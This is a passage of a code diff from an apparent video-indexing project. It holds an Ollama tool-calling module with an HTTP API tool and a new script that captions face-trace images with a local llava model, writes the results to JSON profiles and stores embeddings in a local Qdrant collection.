data = args.get("data")
if not url:
return ToolResult(success=False, data=None, error="No URL provided")
logger.info(f"Calling API: {method} {url[:100]}")
try:
if method == "GET":
resp = req.get(url, headers=headers, timeout=30)
elif method == "POST":
resp = req.post(url, json=data, headers=headers, timeout=30)
elif method == "PUT":
resp = req.put(url, json=data, headers=headers, timeout=30)
elif method == "DELETE":
resp = req.delete(url, headers=headers, timeout=30)
else:
return ToolResult(
success=False,
data=None,
error=f"Unsupported method: {method}"
)
logger.info(f"API response: {resp.status_code}")
return ToolResult(
success=resp.status_code < 400,
data={
"status_code": resp.status_code,
"headers": dict(resp.headers),
"body": resp.text[:10000]
}
)
except Exception as e:
logger.error(f"API call failed: {e}")
return ToolResult(success=False, data=None, error=str(e))
self.registry.register(
name="call_api",
description="Call an external HTTP API endpoint. Use for REST API interactions.",
parameters={
"type": "object",
"properties": {
"url": {
"type": "string",
"description": "API endpoint URL"
},
"method": {
"type": "string",
"enum": ["GET", "POST", "PUT", "DELETE"],
"description": "HTTP method",
"default": "GET"
},
"headers": {
"type": "object",
"description": "HTTP headers"
},
"data": {
"type": "object",
"description": "Request body for POST/PUT"
}
},
"required": ["url"]
},
executor=call_api
)
def main():
"""Example usage"""
caller = OllamaToolCaller()
caller.register_default_tools()
query = "How many videos are in the database?"
print(f"Query: {query}")
print("-" * 50)
result = caller.run(query)
print(f"Result: {result}")
if __name__ == "__main__":
main()
+345
View File
@@ -0,0 +1,345 @@
#!/opt/homebrew/bin/python3.11
"""
Trace VLM Caption - Generate VLM descriptions for face traces
Analyzes key_face.jpg or key_frame.jpg using VLM (llava:7b) and updates trace_profile.json.
Usage:
python trace_vlm_caption.py --trace-dir /path/to/output/{uuid}/trace_0
python trace_vlm_caption.py --file-uuid abc123 --trace-id 0 --output-dir /path/to/output
Output (13 fields):
Person: vlm_description, vlm_clothing, vlm_tags, vlm_hand_objects
Environment: vlm_lighting, vlm_location, vlm_weather, vlm_setting, vlm_transportation
Nature: vlm_has_plants, vlm_plants, vlm_has_animals, vlm_animals
Context: vlm_background, vlm_bg_tags
"""
import argparse
import base64
import json
import os
import sys
from pathlib import Path
try:
import requests
except ImportError:
print("requests not installed: pip install requests", file=sys.stderr)
sys.exit(1)
def encode_image(image_path: str) -> str:
"""Encode image to base64."""
with open(image_path, "rb") as f:
return base64.b64encode(f.read()).decode("utf-8")
def call_vlm(image_path: str, prompt: str, model: str = "llava:7b", ollama_url: str = "http://localhost:11434") -> str:
"""Call Ollama VLM API."""
image_b64 = encode_image(image_path)
payload = {
"model": model,
"prompt": prompt,
"images": [image_b64],
"stream": False,
"options": {"num_predict": 100}
}
try:
resp = requests.post(f"{ollama_url}/api/generate", json=payload, timeout=30)
resp.raise_for_status()
data = resp.json()
return data.get("response", "").strip()
except Exception as e:
print(f"VLM API error: {e}", file=sys.stderr)
return ""
def get_embedding(text: str, model: str = "nomic-embed-text-v2-moe", ollama_url: str = "http://localhost:11434") -> list:
"""Get embedding from Ollama."""
try:
resp = requests.post(
f"{ollama_url}/api/embed",
json={"model": model, "input": text},
timeout=30,
)
resp.raise_for_status()
data = resp.json()
return data.get("embeddings", [[]])[0]
except Exception as e:
print(f"[vlm] Embedding error: {e}", file=sys.stderr)
return []
def store_to_qdrant(profile: dict, file_uuid: str, trace_id: int, qdrant_url: str = "http://localhost:6333", qdrant_api_key: str = None) -> bool:
"""Store VLM results to Qdrant _vlm collection."""
description = profile.get("vlm_description", "")
if not description:
return False
# Get embedding
embedding = get_embedding(description)
if not embedding:
print(f"[vlm] Failed to get embedding for trace_{trace_id}", file=sys.stderr)
return False
# Generate point ID from file_uuid + trace_id
import hashlib
point_id = int(hashlib.md5(f"{file_uuid}_trace_{trace_id}".encode()).hexdigest()[:16], 16)
# Build payload
payload = {
"type": "trace",
"file_uuid": file_uuid,
"trace_id": trace_id,
"vlm_description": profile.get("vlm_description", ""),
"vlm_clothing": profile.get("vlm_clothing", ""),
"vlm_tags": profile.get("vlm_tags", []),
"vlm_hand_objects": profile.get("vlm_hand_objects", ""),
"vlm_lighting": profile.get("vlm_lighting", "unknown"),
"vlm_location": profile.get("vlm_location", "unknown"),
"vlm_weather": profile.get("vlm_weather", "unknown"),
"vlm_setting": profile.get("vlm_setting", "unknown"),
"vlm_transportation": profile.get("vlm_transportation", "unknown"),
"vlm_has_plants": profile.get("vlm_has_plants", False),
"vlm_plants": profile.get("vlm_plants", []),
"vlm_has_animals": profile.get("vlm_has_animals", False),
"vlm_animals": profile.get("vlm_animals", []),
"vlm_background": profile.get("vlm_background", ""),
"vlm_bg_tags": profile.get("vlm_bg_tags", []),
"vlm_model": profile.get("vlm_model", ""),
}
# Upsert to Qdrant
try:
headers = {}
if qdrant_api_key:
headers["api-key"] = qdrant_api_key
resp = requests.put(
f"{qdrant_url}/collections/_vlm/points?wait=true",
json={
"points": [{
"id": point_id,
"vector": embedding,
"payload": payload,
}]
},
headers=headers,
timeout=30,
)
resp.raise_for_status()
print(f"[vlm] Stored to Qdrant: trace_{trace_id}")
return True
except Exception as e:
print(f"[vlm] Qdrant error: {e}", file=sys.stderr)
return False
def analyze_trace(trace_dir: str, model: str = "llava:7b", store_qdrant: bool = True) -> dict:
"""
Analyze a face trace with VLM.
Returns:
Dict with VLM analysis results
"""
trace_path = Path(trace_dir)
profile_path = trace_path / "trace_profile.json"
if not profile_path.exists():
print(f"[vlm] No trace_profile.json in {trace_dir}", file=sys.stderr)
return {}
# Load existing profile
with open(profile_path, "r") as f:
profile = json.load(f)
# Find image to analyze (prefer key_frame.jpg for full context)
key_frame = trace_path / "key_frame.jpg"
key_face = trace_path / "key_face.jpg"
if not key_frame.exists() and not key_face.exists():
print(f"[vlm] No key_frame.jpg or key_face.jpg in {trace_dir}", file=sys.stderr)
return profile
# Use key_frame for clothing/background analysis (full body context)
image_to_analyze = str(key_frame) if key_frame.exists() else str(key_face)
print(f"[vlm] Analyzing {trace_path.name}...")
# Prompt 1: Person description
desc_prompt = "Describe this person briefly. Include: gender, age range, hair, visible clothing. If uncertain, say 'unknown'. Be concise and honest."
description = call_vlm(image_to_analyze, desc_prompt, model)
# Prompt 2: Clothing details
clothing_prompt = "Describe this person's clothing in detail. Include colors, type of clothing, any visible text or logos. If unclear, say 'unclear' or 'partially visible'. Do not guess."
clothing = call_vlm(image_to_analyze, clothing_prompt, model)
# Prompt 3: Tags
tags_prompt = "List 5 tags describing this person's appearance, comma-separated. Only include what you can clearly see. Examples: man, glasses, red-shirt, formal, casual."
tags_raw = call_vlm(image_to_analyze, tags_prompt, model)
tags = [t.strip() for t in tags_raw.replace(",", " ").split() if t.strip()][:5]
# Prompt 5: Objects in hand
hand_prompt = "What is this person holding in their hands? Answer: object names if clearly visible, or 'nothing visible', or 'unclear'. Do not guess."
hand_objects = call_vlm(image_to_analyze, hand_prompt, model)
# Prompt 6: Lighting (day/night)
light_prompt = "What is the lighting condition? Answer one word: day, night, indoor-light, mixed, or unknown. If uncertain, answer 'unknown'."
lighting = call_vlm(image_to_analyze, light_prompt, model).lower().strip()
# Prompt 7: Scene classification
scene_prompt = "Classify the scene. Answer in JSON: {\"location\": \"indoor/outdoor/unknown\", \"weather\": \"sunny/cloudy/rainy/night/unknown\", \"setting\": \"office/street/home/nature/studio/unknown\", \"transportation\": \"car/train/bus/none/unknown\"}. Use 'unknown' if uncertain."
scene_raw = call_vlm(image_to_analyze, scene_prompt, model)
# Parse scene JSON (handle markdown code blocks)
scene_data = {}
try:
# Remove markdown code blocks if present
scene_clean = scene_raw.replace("```json", "").replace("```", "").strip()
scene_data = json.loads(scene_clean)
except:
scene_data = {}
# Prompt 8: Background description
bg_prompt = "Describe the background and environment briefly. Include only what is clearly visible. If uncertain about details, say 'unclear' or 'partially visible'. Do not guess or imagine."
background = call_vlm(image_to_analyze, bg_prompt, model)
# Prompt 9: Plants detection
plants_prompt = "What plants, trees, or flowers are clearly visible? Answer in JSON: {\"has_plants\": true/false, \"plants\": [\"list recognizable plants by name. If not recognizable, describe briefly what you see. Use empty list if none or uncertain.\"]}"
plants_raw = call_vlm(image_to_analyze, plants_prompt, model)
# Parse plants JSON
plants_data = {}
try:
plants_clean = plants_raw.replace("```json", "").replace("```", "").strip()
plants_data = json.loads(plants_clean)
except:
plants_data = {"has_plants": False, "plants": []}
# Prompt 10: Animals detection
animals_prompt = "What animals are clearly visible? Answer in JSON: {\"has_animals\": true/false, \"animals\": [\"list recognizable animals by name. If not recognizable, describe briefly what you see. Use empty list if none or uncertain.\"]}"
animals_raw = call_vlm(image_to_analyze, animals_prompt, model)
# Parse animals JSON
animals_data = {}
try:
animals_clean = animals_raw.replace("```json", "").replace("```", "").strip()
animals_data = json.loads(animals_clean)
except:
animals_data = {"has_animals": False, "animals": []}
# Prompt 11: Background tags
bg_tags_prompt = "List 5 tags for the background/scene, comma-separated. Examples: office, street, sunny, building, car, trees."
bg_tags_raw = call_vlm(image_to_analyze, bg_tags_prompt, model)
bg_tags = [t.strip() for t in bg_tags_raw.replace(",", " ").split() if t.strip()][:5]
# Update profile
profile["vlm_description"] = description
profile["vlm_clothing"] = clothing
profile["vlm_tags"] = tags
profile["vlm_hand_objects"] = hand_objects
profile["vlm_lighting"] = lighting
profile["vlm_location"] = scene_data.get("location", "unknown")
profile["vlm_weather"] = scene_data.get("weather", "unknown")
profile["vlm_setting"] = scene_data.get("setting", "unknown")
profile["vlm_transportation"] = scene_data.get("transportation", "unknown")
profile["vlm_has_plants"] = plants_data.get("has_plants", False)
profile["vlm_plants"] = plants_data.get("plants", [])
profile["vlm_has_animals"] = animals_data.get("has_animals", False)
profile["vlm_animals"] = animals_data.get("animals", [])
profile["vlm_background"] = background
profile["vlm_bg_tags"] = bg_tags
profile["vlm_model"] = model
# Save updated profile
with open(profile_path, "w") as f:
json.dump(profile, f, indent=2)
# Store to Qdrant
if store_qdrant:
file_uuid = profile.get("file_uuid", "")
trace_id = profile.get("trace_id", 0)
if file_uuid:
qdrant_api_key = os.environ.get("QDRANT_API_KEY")
store_to_qdrant(profile, file_uuid, trace_id, qdrant_api_key=qdrant_api_key)
print(f"[vlm] Updated {trace_path.name}: {description[:30]}... | Loc: {scene_data.get('location', '?')} | Light: {lighting} | Hand: {hand_objects[:20]}...")
return profile
def analyze_all_traces(file_uuid: str, output_dir: str, model: str = "llava:7b") -> dict:
"""
Analyze all traces for a file.
Returns:
Summary dict
"""
file_dir = Path(output_dir) / file_uuid
if not file_dir.exists():
print(f"No trace directory: {file_dir}", file=sys.stderr)
return {"error": "No trace directory"}
trace_dirs = sorted(file_dir.glob("trace_*"))
if not trace_dirs:
print(f"No traces found in {file_dir}", file=sys.stderr)
return {"error": "No traces"}
results = []
for trace_dir in trace_dirs:
profile = analyze_trace(str(trace_dir), model)
if profile:
results.append({
"trace_id": profile.get("trace_id"),
"vlm_description": profile.get("vlm_description", "")[:50] + "...",
"vlm_tags": profile.get("vlm_tags", []),
})
return {
"file_uuid": file_uuid,
"total_traces": len(trace_dirs),
"analyzed": len(results),
"traces": results,
}
def main():
parser = argparse.ArgumentParser(description="VLM caption generation for face traces")
parser.add_argument("--trace-dir", "-t", help="Single trace directory")
parser.add_argument("--file-uuid", "-u", help="File UUID (analyze all traces)")
parser.add_argument("--trace-id", type=int, help="Single trace ID (requires --file-uuid)")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
parser.add_argument("--model", "-m", default="llava:7b", help="VLM model name")
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
args = parser.parse_args()
if args.trace_dir:
# Single trace directory
result = analyze_trace(args.trace_dir, args.model)
elif args.file_uuid:
if args.trace_id is not None:
# Single trace
trace_dir = Path(args.output_dir) / args.file_uuid / f"trace_{args.trace_id}"
result = analyze_trace(str(trace_dir), args.model)
else:
# All traces for file
result = analyze_all_traces(args.file_uuid, args.output_dir, args.model)
else:
parser.error("Requires --trace-dir or --file-uuid")
if args.json:
print(json.dumps(result, indent=2))
else:
if "vlm_description" in result:
print(f"Description: {result['vlm_description']}")
print(f"Clothing: {result.get('vlm_clothing', '')}")
print(f"Tags: {result.get('vlm_tags', [])}")
if __name__ == "__main__":
main()
+1
View File
@@ -483,6 +483,7 @@ if __name__ == "__main__":
action="store_true",
help="Force restart from beginning (ignore existing data)",
)
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()